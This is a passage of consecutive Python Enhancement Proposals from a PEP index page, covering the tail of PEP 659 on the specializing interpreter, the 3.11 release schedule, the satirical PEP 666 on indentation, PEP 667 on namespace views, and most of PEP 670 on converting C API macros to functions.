The relative memory use depends on how much code is “hot” enough to trigger
creation of the cache in 3.10. The break even point, where the memory used
by 3.10 is the same as for 3.11 is ~70%.
It is also worth noting that the actual bytecode is only part of a code
object. Code objects also include names, constants and quite a lot of
debugging information.
In summary, for most applications where many of the functions are relatively
unused, 3.11 will consume more memory than 3.10, but not by much.
Security Implications
None
Rejected Ideas
By implementing a specializing adaptive interpreter with inline data caches,
we are implicitly rejecting many alternative ways to optimize CPython.
However, it is worth emphasizing that some ideas, such as just-in-time
compilation, have not been rejected, merely deferred.
Storing data caches before the bytecode.
An earlier implementation of this PEP for 3.11 alpha used a different caching
scheme as described below:
Quickened instructions will be stored in an array (it is neither necessary not
desirable to store them in a Python object) with the same format as the
original bytecode. Ancillary data will be stored in a separate array.Each instruction will use 0 or more data entries.
Each instruction within a family must have the same amount of data allocated,
although some instructions may not use all of it.
Instructions that cannot be specialized, e.g. POP_TOP,
do not need any entries.
Experiments show that 25% to 30% of instructions can be usefully specialized.
Different families will need different amounts of data,
but most need 2 entries (16 bytes on a 64 bit machine).
In order to support larger functions than 256 instructions,
we compute the offset of the first data entry for instructions
as (instruction offset)//2 + (quickened operand).
Compared to the opcache in Python 3.10, this design:
is faster; it requires no memory reads to compute the offset.
3.10 requires two reads, which are dependent.
uses much less memory, as the data can be different sizes for different
instruction families, and doesn’t need an additional array of offsets.
can support much larger functions, up to about 5000 instructions
per function. 3.10 can support about 1000.
We rejected this scheme as the inline cache approach is both faster
and simpler.
References
[1] (1, 2)
The construction of high-performance virtual machines for
dynamic languages, Mark Shannon 2011.
https://theses.gla.ac.uk/2975/1/2011shannonphd.pdf
[2]
Dynamic Interpretation for Dynamic Scripting Languages
https://www.scss.tcd.ie/publications/tech-reports/reports.09/TCD-CS-2009-37.pdf
[3]
Inline Caching meets Quickening
https://www.unibw.de/ucsrl/pubs/ecoop10.pdf/view
[4]
The adaptive and specialized instructions are implemented in
https://github.com/python/cpython/blob/main/Python/ceval.cThe optimizations are implemented in:
https://github.com/python/cpython/blob/main/Python/specialize.c
Copyright
This document is placed in the public domain or under the
CC0-1.0-Universal license, whichever is more permissive.
| Draft | PEP 659 – Specializing Adaptive Interpreter | Informational | In order to perform well, virtual machines for dynamic languages must
specialize the code that they execute to the types and values in the
program being run. This specialization is often associated with “JIT”
compilers, but is beneficial even without machine code generation. |
PEP 664 – Python 3.11 Release Schedule
Author:
Pablo Galindo Salgado <pablogsal at python.org>
Status:
Active
Type:
Informational
Topic:
Release
Created:
12-Jul-2021
Python-Version:
3.11
Table of Contents
Abstract
Release Manager and Crew
Release Schedule
3.11.0 schedule
Bugfix releases
3.11 Lifespan
Features for 3.11
Copyright
Abstract
This document describes the development and release schedule for
Python 3.11. The schedule primarily concerns itself with PEP-sized
items.
Release Manager and Crew
3.11 Release Manager: Pablo Galindo Salgado
Windows installers: Steve Dower
Mac installers: Ned Deily
Documentation: Julien Palard
Release Schedule
3.11.0 schedule
Note: the dates below use a 17-month development period that results
in a 12-month release cadence between feature versions, as defined by
PEP 602.
Actual:
3.11 development begins: Monday, 2021-05-03
3.11.0 alpha 1: Tuesday, 2021-10-05
3.11.0 alpha 2: Tuesday, 2021-11-02
3.11.0 alpha 3: Wednesday, 2021-12-08
3.11.0 alpha 4: Friday, 2022-01-14
3.11.0 alpha 5: Thursday, 2022-02-03
3.11.0 alpha 6: Monday, 2022-03-07
3.11.0 alpha 7: Tuesday, 2022-04-05
3.11.0 beta 1: Sunday, 2022-05-08
(No new features beyond this point.)
3.11.0 beta 2: Tuesday, 2022-05-31
3.11.0 beta 3: Wednesday, 2022-06-01
3.11.0 beta 4: Monday, 2022-07-11
3.11.0 beta 5: Tuesday, 2022-07-26
3.11.0 candidate 1: Monday, 2022-08-08
3.11.0 candidate 2: Monday, 2022-09-12
3.11.0 final: Monday, 2022-10-24
Bugfix releases
Actual:
3.11.1: Tuesday, 2022-12-06
3.11.2: Wednesday, 2023-02-08
3.11.3: Wednesday, 2023-04-05
3.11.4: Tuesday, 2023-06-06
3.11.5: Thursday, 2023-08-24
3.11.6: Monday, 2023-10-02
3.11.7: Monday, 2023-12-04
Expected:
3.11.8: Monday, 2024-02-05
Final regular bugfix release with binary installers:
3.11.9: Monday, 2024-04-01
3.11 Lifespan
3.11 will receive bugfix updates approximately every 2 months for
approximately 18 months. Some time after the release of 3.12.0 final,
the ninth and final 3.11 bugfix update will be released. After that,
it is expected that security updates (source only) will be released
until 5 years after the release of 3.11.0 final, so until approximately
October 2027.
Features for 3.11
Some of the notable features of Python 3.11 include:
PEP 654, Exception Groups and except*.
PEP 657, Enhanced error locations in tracebacks.
PEP 680, Support for parsing TOML in the standard library
Python 3.11 is up to 10-60% faster than Python 3.10. On average, we measured
a 1.25x speedup on the standard benchmark suite. See Faster CPython for
details.
Typing features:
PEP 646, Variadic generics.
PEP 655, Marking individual TypedDict items as required or potentially-missing.
PEP 673, Self type.
PEP 675, Arbitrary literal string type.
PEP 681, Dataclass transforms
Copyright
This document has been placed in the public domain.
| Active | PEP 664 – Python 3.11 Release Schedule | Informational | This document describes the development and release schedule for
Python 3.11. The schedule primarily concerns itself with PEP-sized
items. |
PEP 666 – Reject Foolish Indentation
Author:
Laura Creighton <lac at strakt.com>
Status:
Rejected
Type:
Standards Track
Created:
03-Dec-2001
Python-Version:
2.2
Post-History:
05-Dec-2001
Table of Contents
Abstract
Rationale
References
Copyright
Abstract
Everybody agrees that mixing tabs and spaces is a bad idea. Some
people want more than this. I propose that we let people define
whatever Python behaviour they want, so it will only run the way
they like it, and will not run the way they don’t like it. We
will do this with a command line switch. Programs that aren’t
formatted the way the programmer wants things will raise
IndentationError.
python -TNone will refuse to run when there are any tabs.
python -Tn will refuse to run when tabs are not exactly n spaces
python -TOnly will refuse to run when blocks are indented by anything
other than tabs
People who mix tabs and spaces, naturally, will find that their
programs do not run. Alas, we haven’t found a way to give them an
electric shock as from a cattle prod remotely. (Though if somebody
finds out a way to do this, I will be pleased to add this option to
the PEP.)
Rationale
[email protected] (a.k.a. comp.lang.python) is periodically
awash with discussions about tabs and spaces. This is inevitable,
given that indentation is syntactically significant in Python.
This has never solved anything, and just makes various people
frustrated and angry. Eventually they start saying rude things to
each other which is sad for all of us. And it is also sad that
they are wasting their valuable time which they could spend
creating something with Python. Moreover, for the Python community
as a whole, from a public relations point of view, this is quite
unfortunate. The people who aren’t posting about tabs and spaces,
are, (unsurprisingly) invisible, while the people who are posting
make the rest of us look somewhat foolish.
The problem is that there is no polite way to say ‘Stop wasting
your valuable time and mine.’ People who are already in the middle
of a flame war are not well disposed to believe that you are acting
out of compassion for them, and quite rightly insist that their own
time is their own to do with as they please. They are stuck like
flies in treacle in this wretched argument, and it is self-evident
that they cannot disengage or they would have already done so.
But today I had to spend time cleaning my keyboard because the ‘n’
key is sticking. So, in addition to feeling compassion for these
people, I am pretty annoyed. I figure if I make this PEP, we can
then ask Guido to quickly reject it, and then when this argument
next starts up again, we can say ‘Guido isn’t changing things to
suit the tab-haters or the only-tabbers, so this conversation is a
waste of time.’ Then everybody can quietly believe that a) they
are correct and b) other people are fools and c) they are
undeniably fortunate to not have to share a lab with idiots, (which
is something the arguers could do _now_, but apparently have
forgotten).
And python-list can go back to worrying if it is too smug, rather
than whether it is too hostile for newcomers. Possibly somebody
could get around to explaining to me what is the difference between
__getattr__ and __getattribute__ in non-Classic classes in 2.2, a
question I have foolishly posted in the middle of the current tab
thread. I would like to know the answer to that question [1].
This proposal, if accepted, will probably mean a heck of a lot of
work for somebody. But since I don’t want it accepted, I don’t
care.
References
[1]
Tim Peters already has (private correspondence). My early 2.2
didn’t have a __getattribute__, and __getattr__ was
implemented like __getattribute__ now is. This has been
fixed. The important conclusion is that my Decorator Pattern
is safe and all is right with the world.
Copyright
This document has been placed in the public domain.
| Rejected | PEP 666 – Reject Foolish Indentation | Standards Track | Everybody agrees that mixing tabs and spaces is a bad idea. Some
people want more than this. I propose that we let people define
whatever Python behaviour they want, so it will only run the way
they like it, and will not run the way they don’t like it. We
will do this with a command line switch. Programs that aren’t
formatted the way the programmer wants things will raise
IndentationError. |
PEP 667 – Consistent views of namespaces
Author:
Mark Shannon <mark at hotpy.org>
Status:
Draft
Type:
Standards Track
Created:
30-Jul-2021
Python-Version:
3.13
Post-History:
20-Aug-2021
Table of Contents
Abstract
Motivation
Rationale
Specification
Python
C-API
Extensions to the API
Changes to existing APIs
Behavior of f_locals for optimized functions
Backwards Compatibility
Python
C-API
PyEval_GetLocals
PyFrame_FastToLocals, etc.
Implementation
C API
Impact on PEP 709 inlined comprehensions
Comparison with PEP 558
Open Issues
Have locals() return a mapping proxy
Lifetime of the mapping proxy
References
Copyright
Abstract
In early versions of Python all namespaces, whether in functions,
classes or modules, were all implemented the same way: as a dictionary.
For performance reasons, the implementation of function namespaces was
changed. Unfortunately this meant that accessing these namespaces through
locals() and frame.f_locals ceased to be consistent and some
odd bugs crept in over the years as threads, generators and coroutines
were added.
This PEP proposes making these namespaces consistent once more.
Modifications to frame.f_locals will always be visible in
the underlying variables. Modifications to local variables will
immediately be visible in frame.f_locals, and they will be
consistent regardless of threading or coroutines.
The locals() function will act the same as it does now for class
and modules scopes. For function scopes it will return an instantaneous
snapshot of the underlying frame.f_locals.
Motivation
The current implementation of locals() and frame.f_locals is slow,
inconsistent and buggy.
We want to make it faster, consistent, and most importantly fix the bugs.
For example:
class C:
x = 1
sys._getframe().f_locals['x'] = 2
print(x)
prints 2
but:
def f():
x = 1
sys._getframe().f_locals['x'] = 2
print(x)
f()
prints 1
This is inconsistent, and confusing.
With this PEP both examples would print 2.
Worse than that, the current behavior can result in strange bugs [1]
There are no compensating advantages for the current behavior;
it is unreliable and slow.
Rationale
The current implementation of frame.f_locals returns a dictionary
that is created on the fly from the array of local variables.
This can result in the array and dictionary getting out of sync with
each other. Writes to the f_locals may not show up as
modifications to local variables. Writes to local variables can get lost.
By making frame.f_locals return a view on the
underlying frame, these problems go away. frame.f_locals is always in
sync with the frame because it is a view of it, not a copy of it.
Specification
Python
frame.f_locals will return a view object on the frame that
implements the collections.abc.Mapping interface.
For module and class scopes frame.f_locals will be a dictionary,
for function scopes it will be a custom class.
locals() will be defined as:
def locals():
frame = sys._getframe(1)
f_locals = frame.f_locals
if frame.is_function():
f_locals = dict(f_locals)
return f_locals
All writes to the f_locals mapping will be immediately visible
in the underlying variables. All changes to the underlying variables
will be immediately visible in the mapping. The f_locals object will
be a full mapping, and can have arbitrary key-value pairs added to it.
For example:
def l():
"Get the locals of caller"
return sys._getframe(1).f_locals
def test():
if 0: y = 1 # Make 'y' a local variable
x = 1
l()['x'] = 2
l()['y'] = 4
l()['z'] = 5
y
print(locals(), x)
test() will print {'x': 2, 'y': 4, 'z': 5} 2.
In Python 3.10, the above will fail with an UnboundLocalError,
as the definition of y by l()['y'] = 4 is lost.
If the second-to-last line were changed from y to z, this would be a
NameError, as it is today. Keys added to frame.f_locals that are not
lexically local variables remain visible in frame.f_locals, but do not
dynamically become local variables.
C-API
Extensions to the API
Four new C-API functions will be added:
PyObject *PyEval_GetFrameLocals(void)
PyObject *PyEval_GetFrameGlobals(void)
PyObject *PyEval_GetFrameBuiltins(void)
PyObject *PyFrame_GetLocals(PyFrameObject *f)
PyEval_GetFrameLocals() is equivalent to: locals().
PyEval_GetFrameGlobals() is equivalent to: globals().
PyFrame_GetLocals(f) is equivalent to: f.f_locals.
All these functions will return a new reference.
Changes to existing APIs
The following C-API functions will be deprecated, as they return borrowed references:
PyEval_GetLocals()
PyEval_GetGlobals()
PyEval_GetBuiltins()
They will be removed in 3.15.
The following functions should be used instead:
PyEval_GetFrameLocals()
PyEval_GetFrameGlobals()
PyEval_GetFrameBuiltins()
which return new references.
The semantics of PyEval_GetLocals() is changed as it now returns a
view of the frame locals, not a dictionary.
The following three functions will become no-ops, and will be deprecated:
PyFrame_FastToLocalsWithError()
PyFrame_FastToLocals()
PyFrame_LocalsToFast()
They will be removed in 3.15.
Behavior of f_locals for optimized functions
Although f.f_locals behaves as if it were the namespace of the function,
there will be some observable differences.
For example, f.f_locals is f.f_locals may be False.
However f.f_locals == f.f_locals will be True, and
all changes to the underlying variables, by any means, will be
always be visible.
Backwards Compatibility
Python
The current implementation has many corner cases and oddities.
Code that works around those may need to be changed.
Code that uses locals() for simple templating, or print debugging,
will continue to work correctly. Debuggers and other tools that use
f_locals to modify local variables, will now work correctly,
even in the presence of threaded code, coroutines and generators.
C-API
PyEval_GetLocals
Because PyEval_GetLocals() returns a borrowed reference, it requires
the dictionary to be cached on the frame, extending its lifetime and
creating a cycle. PyEval_GetFrameLocals() should be used instead.
This code:
locals = PyEval_GetLocals();
if (locals == NULL) {
goto error_handler;
}
Py_INCREF(locals);
should be replaced with:
locals = PyEval_GetFrameLocals();
if (locals == NULL) {
goto error_handler;
}
PyFrame_FastToLocals, etc.
These functions were designed to convert the internal “fast” representation
of the locals variables of a function to a dictionary, and vice versa.
Calls to them are no longer required. C code that directly accesses the
f_locals field of a frame should be modified to call
PyFrame_GetLocals() instead:
PyFrame_FastToLocals(frame);
PyObject *locals = frame.f_locals;
Py_INCREF(locals);
becomes:
PyObject *locals = PyFrame_GetLocals(frame);
if (frame == NULL)
goto error_handler;
Implementation
Each read of frame.f_locals will create a new proxy object that gives
the appearance of being the mapping of local (including cell and free)
variable names to the values of those local variables.
A possible implementation is sketched out below.
All attributes that start with an underscore are invisible and
cannot be accessed directly.
They serve only to illustrate the proposed design.
NULL: Object # NULL is a singleton representing the absence of a value.
class CodeType:
_name_to_offset_mapping_impl: dict | NULL
_cells: frozenset # Set of indexes of cell and free variables
...
def __init__(self, ...):
self._name_to_offset_mapping_impl = NULL
self._variable_names = deduplicate(
self.co_varnames + self.co_cellvars + self.co_freevars
)
...
@property
def _name_to_offset_mapping(self):
"Mapping of names to offsets in local variable array."
if self._name_to_offset_mapping_impl is NULL:
self._name_to_offset_mapping_impl = {
name: index for (index, name) in enumerate(self._variable_names)
}
return self._name_to_offset_mapping_impl
class FrameType:
_locals : array[Object] # The values of the local variables, items may be NULL.
_extra_locals: dict | NULL # Dictionary for storing extra locals not in _locals.
_locals_cache: FrameLocalsProxy | NULL # required to support PyEval_GetLocals()
def __init__(self, ...):
self._extra_locals = NULL
self._locals_cache = NULL
...
@property
def f_locals(self):
return FrameLocalsProxy(self)
class FrameLocalsProxy:
"Implements collections.MutableMapping."
__slots__ "_frame"
def __init__(self, frame:FrameType):
self._frame = frame
def __getitem__(self, name):
f = self._frame
co = f.f_code
if name in co._name_to_offset_mapping:
index = co._name_to_offset_mapping[name]
val = f._locals[index]
if val is NULL:
raise KeyError(name)
if index in co._cells
val = val.cell_contents
if val is NULL:
raise KeyError(name)
return val
else:
if f._extra_locals is NULL:
raise KeyError(name)
return f._extra_locals[name]
def __setitem__(self, name, value):
f = self._frame
co = f.f_code
if name in co._name_to_offset_mapping:
index = co._name_to_offset_mapping[name]
kind = co._local_kinds[index]
if index in co._cells
cell = f._locals[index]
cell.cell_contents = val
else:
f._locals[index] = val
else:
if f._extra_locals is NULL:
f._extra_locals = {}
f._extra_locals[name] = val
def __iter__(self):
f = self._frame
co = f.f_code
yield from iter(f._extra_locals)
for index, name in enumerate(co._variable_names):
val = f._locals[index]
if val is NULL:
continue
if index in co._cells:
val = val.cell_contents
if val is NULL:
continue
yield name
def __contains__(self, item):
f = self._frame
if item in f._extra_locals:
return True
return item in co._variable_names
def __len__(self):
f = self._frame
co = f.f_code
res = 0
for index, _ in enumerate(co._variable_names):
val = f._locals[index]
if val is NULL:
continue
if index in co._cells:
if val.cell_contents is NULL:
continue
res += 1
return len(self._extra_locals) + res
C API
PyEval_GetLocals() will be implemented roughly as follows:
PyObject *PyEval_GetLocals(void) {
PyFrameObject * = ...; // Get the current frame.
if (frame->_locals_cache == NULL) {
frame->_locals_cache = PyEval_GetFrameLocals();
}
return frame->_locals_cache;
}
As with all functions that return a borrowed reference, care must be taken to
ensure that the reference is not used beyond the lifetime of the object.
Impact on PEP 709 inlined comprehensions
For inlined comprehensions within a function, locals() currently behaves the
same inside or outside of the comprehension, and this will not change. The
behavior of locals() inside functions will generally change as specified in
the rest of this PEP.
For inlined comprehensions at module or class scope, currently calling
locals() within the inlined comprehension returns a new dictionary for each
call. This PEP will make locals() within a function also always return a new
dictionary for each call, improving consistency; class or module scope inlined
comprehensions will appear to behave as if the inlined comprehension is still a
distinct function.
Comparison with PEP 558
This PEP and PEP 558 share a common goal:
to make the semantics of locals() and frame.f_locals()
intelligible, and their operation reliable.
The key difference between this PEP and PEP 558 is that
PEP 558 keeps an internal copy of the local variables,
whereas this PEP does not.
PEP 558 does not specify exactly when the internal copy is
updated, making the behavior of PEP 558 impossible to reason about.
Open Issues
Have locals() return a mapping proxy
An alternative way to define locals() would be simply as:
def locals():
return sys._getframe(1).f_locals
This would be simpler and easier to understand. However,
there would be backwards compatibility issues when locals() is assigned
to a local variable or passed to eval or exec.
Lifetime of the mapping proxy
Each read of the f_locals attributes creates a new mapping proxy.
This is done to avoid creating a reference cycle.
An alternative would be to cache the proxy on the frame, so that
frame.f_locals is frame.f_locals would be true.
The downside of this is that the reference cycle would delay collection
of both the frame and mapping proxy until the next cycle collection.
PyEval_GetLocals() already creates a cycle, as it returns a borrowed reference.
References
[1]
https://bugs.python.org/issue30744
Copyright
This document is placed in the public domain or under the
CC0-1.0-Universal license, whichever is more permissive.
| Draft | PEP 667 – Consistent views of namespaces | Standards Track | In early versions of Python all namespaces, whether in functions,
classes or modules, were all implemented the same way: as a dictionary. |
PEP 670 – Convert macros to functions in the Python C API
Author:
Erlend Egeberg Aasland <erlend at python.org>,
Victor Stinner <vstinner at python.org>
Status:
Final
Type:
Standards Track
Created:
19-Oct-2021
Python-Version:
3.11
Post-History:
20-Oct-2021,
08-Feb-2022,
22-Feb-2022
Resolution:
Python-Dev thread
Table of Contents
Abstract
Rationale
Specification
Convert macros to static inline functions
Convert static inline functions to regular functions
Cast pointer arguments
Avoid the cast in the limited C API version 3.11
Return type is not changed
Backwards Compatibility
Examples of Macro Pitfalls
Duplication of side effects
Misnesting
Examples of hard to read macros
PyObject_INIT()
_Py_NewReference()
PyUnicode_READ_CHAR()
Macros converted to functions since Python 3.8
Macros converted to static inline functions
Macros converted to regular functions
Static inline functions converted to regular functions
Incompatible changes
Performance concerns and benchmarks
Static inline functions
Debug build
Force inlining
Disabling inlining
Rejected Ideas
Keep macros, but fix some macro issues
Post History
References
Version History
Copyright
Abstract
Macros in the C API will be converted to static inline functions or
regular functions. This will help avoid macro pitfalls in C/C++, and
make the functions usable from other programming languages.
To avoid compiler warnings, function arguments of pointer types
will be cast to appropriate types using additional macros.
The cast will not be done in the limited C API version 3.11:
users who opt in to the new limited API may need to add casts to
the exact expected type.
To avoid introducing incompatible changes, macros which can be used as
l-value in an assignment will not be converted.
Rationale
The use of macros may have unintended adverse effects that are hard to
avoid, even for experienced C developers. Some issues have been known
for years, while others have been discovered recently in Python.
Working around macro pitfalls makes the macro code harder to read and
to maintain.
Converting macros to functions has multiple advantages:
Functions don’t suffer from macro pitfalls, for example the following
ones described in GCC documentation:
Misnesting
Operator precedence problems
Swallowing the semicolon
Duplication of side effects
Self-referential macros
Argument prescan
Newlines in arguments
Functions don’t need the following workarounds for macro
pitfalls, making them usually easier to read and to maintain than
similar macro code:
Adding parentheses around arguments.
Using line continuation characters if the function is written on
multiple lines.
Adding commas to execute multiple expressions.
Using do { ... } while (0) to write multiple statements.
Argument types and the return type of functions are well defined.
Debuggers and profilers can retrieve the name of inlined functions.
Debuggers can put breakpoints on inlined functions.
Variables have a well-defined scope.
Converting macros and static inline functions to regular functions makes
these regular functions accessible to projects which use Python but
cannot use macros and static inline functions.
Specification
Convert macros to static inline functions
Most macros will be converted to static inline functions.
The following macros will not be converted:
Object-like macros (i.e. those which don’t need parentheses and
arguments). For example:
Empty macros. Example: #define Py_HAVE_CONDVAR.
Macros only defining a value, even if a constant with a well defined
type would be better. Example: #define METH_VARARGS 0x0001.
Compatibility layer for different C compilers, C language extensions,
or recent C features.
Example: Py_GCC_ATTRIBUTE(), Py_ALWAYS_INLINE, Py_MEMCPY().
Macros used for definitions rather than behavior.
Example: PyAPI_FUNC, Py_DEPRECATED, Py_PYTHON_H.
Macros that need C preprocessor features, like stringification and
concatenation. Example: Py_STRINGIFY().
Macros which cannot be converted to functions. Examples:
Py_BEGIN_ALLOW_THREADS (contains an unpaired }), Py_VISIT
(relies on specific variable names), Py_RETURN_RICHCOMPARE (returns
from the calling function).
Macros which can be used as an l-value in assignments. This would be
an incompatible change and is out of the scope of this PEP.
Example: PyBytes_AS_STRING().
Macros which have different return types depending on the code path
or arguments.
Convert static inline functions to regular functions
Static inline functions in the public C API may be converted to regular
functions, but only if there is no measurable performance impact of
changing the function.
The performance impact should be measured with benchmarks.
Cast pointer arguments
Currently, most macros accepting pointers cast pointer arguments to
their expected types. For example, in Python 3.6, the Py_TYPE()
macro casts its argument to PyObject*:
#define Py_TYPE(ob) (((PyObject*)(ob))->ob_type)
The Py_TYPE() macro accepts the PyObject* type, but also any
pointer types, such as PyLongObject* and PyDictObject*.
Functions are strongly typed, and can only accept one type of argument.
To avoid compiler errors and warnings in existing code, when a macro is
converted to a function and the macro casts at least one of its arguments
a new macro will be added to keep the cast. The new macro
and the function will have the same name.
Example with the Py_TYPE()
macro converted to a static inline function:
static inline PyTypeObject* Py_TYPE(PyObject *ob) {
return ob->ob_type;
}
#define Py_TYPE(ob) Py_TYPE((PyObject*)(ob))
The cast is kept for all pointer types, not only PyObject*.
This includes casts to void*: removing a cast to void* would emit
a new warning if the function is called with a const void* variable.
For example, the PyUnicode_WRITE() macro casts its data argument to
void*, and so it currently accepts const void* type, even though
it writes into data. This PEP will not change this.
Avoid the cast in the limited C API version 3.11
The casts will be excluded from the limited C API version 3.11 and newer.
When an API user opts into the new limited API, they must pass the expected
type or perform the cast.
As an example, Py_TYPE() will be defined like this:
static inline PyTypeObject* Py_TYPE(PyObject *ob) {
return ob->ob_type;
}
#if !defined(Py_LIMITED_API) || Py_LIMITED_API+0 < 0x030b0000
# define Py_TYPE(ob) Py_TYPE((PyObject*)(ob))
#endif
Return type is not changed
When a macro is converted to a function, its return type must not change
to prevent emitting new compiler warnings.
For example, Python 3.7 changed the return type of PyUnicode_AsUTF8()
from char* to const char* (commit).
The change emitted new compiler warnings when building C extensions
expecting char*. This PEP doesn’t change the return type to prevent
this issue.
Backwards Compatibility
The PEP is designed to avoid C API incompatible changes.
Only C extensions explicitly targeting the limited C API version 3.11
must now pass the expected types to functions: pointer arguments are no
longer cast to the expected types.
Function arguments of pointer types are still cast and return types are
not changed to prevent emitting new compiler warnings.
Macros which can be used as l-value in an assignment are not modified by
this PEP to avoid incompatible changes.
Examples of Macro Pitfalls
Duplication of side effects
Macros:
#define PySet_Check(ob) \
(Py_IS_TYPE(ob, &PySet_Type) \
|| PyType_IsSubtype(Py_TYPE(ob), &PySet_Type))
#define Py_IS_NAN(X) ((X) != (X))
If the op or the X argument has a side effect, the side effect is
duplicated: it executed twice by PySet_Check() and Py_IS_NAN().
For example, the pos++ argument in the
PyUnicode_WRITE(kind, data, pos++, ch) code has a side effect.
This code is safe because the PyUnicode_WRITE() macro only uses its
3rd argument once and so does not duplicate pos++ side effect.
Misnesting
Example of the bpo-43181: Python macros don’t shield arguments. The PyObject_TypeCheck()
macro before it has been fixed:
#define PyObject_TypeCheck(ob, tp) \
(Py_IS_TYPE(ob, tp) || PyType_IsSubtype(Py_TYPE(ob), (tp)))
C++ usage example:
PyObject_TypeCheck(ob, U(f<a,b>(c)))
The preprocessor first expands it:
(Py_IS_TYPE(ob, f<a,b>(c)) || ...)
C++ "<" and ">" characters are not treated as brackets by the
preprocessor, so the Py_IS_TYPE() macro is invoked with 3 arguments:
ob
f<a
b>(c)
The compilation fails with an error on Py_IS_TYPE() which only takes
2 arguments.
The bug is that the op and tp arguments of PyObject_TypeCheck()
must be put between parentheses: replace Py_IS_TYPE(ob, tp) with
Py_IS_TYPE((ob), (tp)). In regular C code, these parentheses are
redundant, can be seen as a bug, and so are often forgotten when writing
macros.
To avoid Macro Pitfalls, the PyObject_TypeCheck() macro has been
converted to a static inline function:
commit.
Examples of hard to read macros
PyObject_INIT()
Example showing the usage of commas in a macro which has a return value.
Python 3.7 macro:
#define PyObject_INIT(op, typeobj) \
( Py_TYPE(op) = (typeobj), _Py_NewReference((PyObject *)(op)), (op) )
Python 3.8 function (simplified code):
static inline PyObject*
_PyObject_INIT(PyObject *op, PyTypeObject *typeobj)
{
Py_TYPE(op) = typeobj;
_Py_NewReference(op);
return op;
}
#define PyObject_INIT(op, typeobj) \
_PyObject_INIT(_PyObject_CAST(op), (typeobj))
The function doesn’t need the line continuation character "\".
It has an explicit "return op;" rather than the surprising
", (op)" syntax at the end of the macro.
It uses short statements on multiple lines, rather than being written
as a single long line.
Inside the function, the op argument has the well defined type
PyObject* and so doesn’t need casts like (PyObject *)(op).
Arguments don’t need to be put inside parentheses: use typeobj,
rather than (typeobj).
_Py_NewReference()
Example showing the usage of an #ifdef inside a macro.
Python 3.7 macro (simplified code):
#ifdef COUNT_ALLOCS
# define _Py_INC_TPALLOCS(OP) inc_count(Py_TYPE(OP))
# define _Py_COUNT_ALLOCS_COMMA ,
#else
# define _Py_INC_TPALLOCS(OP)
# define _Py_COUNT_ALLOCS_COMMA
#endif /* COUNT_ALLOCS */
#define _Py_NewReference(op) ( \
_Py_INC_TPALLOCS(op) _Py_COUNT_ALLOCS_COMMA \
Py_REFCNT(op) = 1)
Python 3.8 function (simplified code):
static inline void _Py_NewReference(PyObject *op)
{
_Py_INC_TPALLOCS(op);
Py_REFCNT(op) = 1;
}
PyUnicode_READ_CHAR()
This macro reuses arguments, and possibly calls PyUnicode_KIND multiple
times:
#define PyUnicode_READ_CHAR(unicode, index) \
(assert(PyUnicode_Check(unicode)), \
assert(PyUnicode_IS_READY(unicode)), \
(Py_UCS4) \
(PyUnicode_KIND((unicode)) == PyUnicode_1BYTE_KIND ? \
((const Py_UCS1 *)(PyUnicode_DATA((unicode))))[(index)] : \
(PyUnicode_KIND((unicode)) == PyUnicode_2BYTE_KIND ? \
((const Py_UCS2 *)(PyUnicode_DATA((unicode))))[(index)] : \
((const Py_UCS4 *)(PyUnicode_DATA((unicode))))[(index)] \
) \
))
Possible implementation as a static inlined function:
static inline Py_UCS4
PyUnicode_READ_CHAR(PyObject *unicode, Py_ssize_t index)
{
assert(PyUnicode_Check(unicode));
assert(PyUnicode_IS_READY(unicode));
switch (PyUnicode_KIND(unicode)) {
case PyUnicode_1BYTE_KIND:
return (Py_UCS4)((const Py_UCS1 *)(PyUnicode_DATA(unicode)))[index];
case PyUnicode_2BYTE_KIND:
return (Py_UCS4)((const Py_UCS2 *)(PyUnicode_DATA(unicode)))[index];
case PyUnicode_4BYTE_KIND:
default:
return (Py_UCS4)((const Py_UCS4 *)(PyUnicode_DATA(unicode)))[index];
}
}
Macros converted to functions since Python 3.8
This is a list of macros already converted to functions between
Python 3.8 and Python 3.11.
Even though some converted macros (like Py_INCREF()) are very
commonly used by C extensions, these conversions did not significantly
impact Python performance and most of them didn’t break backward
compatibility.
Macros converted to static inline functions
Python 3.8:
Py_DECREF()
Py_INCREF()
Py_XDECREF()
Py_XINCREF()
PyObject_INIT()
PyObject_INIT_VAR()
_PyObject_GC_UNTRACK()
_Py_Dealloc()
Macros converted to regular functions
Python 3.9:
PyIndex_Check()
PyObject_CheckBuffer()
PyObject_GET_WEAKREFS_LISTPTR()
PyObject_IS_GC()
PyObject_NEW(): alias to PyObject_New()
PyObject_NEW_VAR(): alias to PyObjectVar_New()
To avoid performance slowdown on Python built without LTO,
private static inline functions have been added to the internal C API:
_PyIndex_Check()
_PyObject_IS_GC()
_PyType_HasFeature()
_PyType_IS_GC()
Static inline functions converted to regular functions
Python 3.11:
PyObject_CallOneArg()
PyObject_Vectorcall()
PyVectorcall_Function()
_PyObject_FastCall()
To avoid performance slowdown on Python built without LTO, a
private static inline function has been added to the internal C API:
_PyVectorcall_FunctionInline()
Incompatible changes
While other converted macros didn’t break the backward compatibility,
there is an exception.
The 3 macros Py_REFCNT(), Py_TYPE() and Py_SIZE() have been
converted to static inline functions in Python 3.10 and 3.11 to disallow
using them as l-value in assignment. It is an incompatible change made
on purpose: see bpo-39573 for
the rationale.
This PEP does not propose converting macros which can be used as l-value
to avoid introducing new incompatible changes.
Performance concerns and benchmarks
There have been concerns that converting macros to functions can degrade
performance.
This section explains performance concerns and shows benchmark results
using PR 29728, which
replaces the following static inline functions with macros:
PyObject_TypeCheck()
PyType_Check(), PyType_CheckExact()
PyType_HasFeature()
PyVectorcall_NARGS()
Py_DECREF(), Py_XDECREF()
Py_INCREF(), Py_XINCREF()
Py_IS_TYPE()
Py_NewRef()
Py_REFCNT(), Py_TYPE(), Py_SIZE()
The benchmarks were run on Fedora 35 (Linux) with GCC 11 on a laptop with 8
logical CPUs (4 physical CPU cores).
Static inline functions
First of all, converting macros to static inline functions has
negligible impact on performance: the measured differences are consistent
with noise due to unrelated factors.
Static inline functions are a new feature in the C99 standard. Modern C
compilers have efficient heuristics to decide if a function should be
inlined or not.
When a C compiler decides to not inline, there is likely a good reason.
For example, inlining would reuse a register which requires to
save/restore the register value on the stack and so increases the stack
memory usage, or be less efficient.
Benchmark of the ./python -m test -j5 command on Python built in
release mode with gcc -O3, LTO and PGO:
Macros (PR 29728): 361 sec +- 1 sec
Static inline functions (reference): 361 sec +- 1 sec
There is no significant performance difference between macros and
static inline functions when static inline functions are inlined.
Debug build
Performance in debug builds can suffer when macros are converted to
functions. This is compensated by better debuggability: debuggers can
retrieve function names, set breakpoints inside functions, etc.
